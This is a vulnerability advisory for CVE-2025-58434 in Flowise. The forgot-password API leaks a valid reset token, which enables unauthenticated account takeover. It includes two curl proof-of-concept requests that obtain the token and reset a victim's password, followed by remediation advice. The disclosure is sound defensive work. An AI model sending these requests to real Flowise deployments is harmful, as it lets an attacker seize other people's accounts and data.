Summary

The forgot-password endpoint in Flowise returns sensitive information including a valid password reset tempToken without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete account takeover (ATO).

This vulnerability applies to both the cloud service (cloud.flowiseai.com) and self-hosted/local Flowise deployments that expose the same API.

CVSS v3.1 Base Score: 9.8 (Critical)
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Details

• The endpoint /api/v1/account/forgot-password accepts an email address as input.

• Instead of only sending a reset email, the API responds directly with sensitive user details, including:

  • User ID, name, email, hashed credential, status, timestamps.
  • A valid tempToken and its expiry, which is intended for password reset.

• This tempToken can then be reused immediately in the /api/v1/account/reset-password endpoint to reset the password of the targeted account without any email verification or user interaction.

• Exploitation requires only the victim’s email address, which is often guessable or discoverable.

• Because the vulnerable endpoints exist in both Flowise Cloud and local/self-hosted deployments, any exposed instance is vulnerable to account takeover.

This effectively allows any unauthenticated attacker to take over arbitrary accounts (including admin or privileged accounts) by requesting a reset for their email.

PoC

1. Request a reset token for the victim

curl -i -X POST https://<target>/api/v1/account/forgot-password \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"<victim@example.com>"}}'

Response (201 Created):

{
  "user": {
    "id": "<redacted-uuid>",
    "name": "<redacted>",
    "email": "<victim@example.com>",
    "credential": "<redacted-hash>",
    "tempToken": "<redacted-tempToken>",
    "tokenExpiry": "2025-08-19T13:00:33.834Z",
    "status": "active"
  }
}

2. Use the exposed tempToken to reset the password

curl -i -X POST https://<target>/api/v1/account/reset-password \
  -H "Content-Type: application/json" \
  -d '{
        "user":{
          "email":"<victim@example.com>",
          "tempToken":"<redacted-tempToken>",
          "password":"NewSecurePassword123!"
        }
      }'

Expected Result: 200 OK
The victim’s account password is reset, allowing full login.

Impact

• Type: Authentication bypass / Insecure direct object exposure.

• Impact:

  • Any account (including administrator or high-value accounts) can be reset and taken over with only the email address.
  • Applies to both Flowise Cloud and locally hosted/self-managed deployments.
  • Leads to full account takeover, data exposure, impersonation, and possible control over organizational assets.
  • High likelihood of exploitation since no prior access or user interaction is required.

Recommended Remediation

• Do not return reset tokens or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel.
• Ensure forgot-password responds with a generic success message regardless of input, to avoid user enumeration.
• Require strong validation of the tempToken (e.g., single-use, short expiry, tied to request origin, validated against email delivery).
• Apply the same fixes to both cloud and self-hosted/local deployments.
• Log and monitor password reset requests for suspicious activity.
• Consider multi-factor verification for sensitive accounts.

Credit

⚠️ This is a Critical ATO vulnerability because it allows attackers to compromise any account with only knowledge of an email address, and it applies to all deployment models (cloud and local).

References

• GHSA-wgpv-6j63-x5ph
• https://nvd.nist.gov/vuln/detail/CVE-2025-58434
• FlowiseAI/Flowise@9e178d6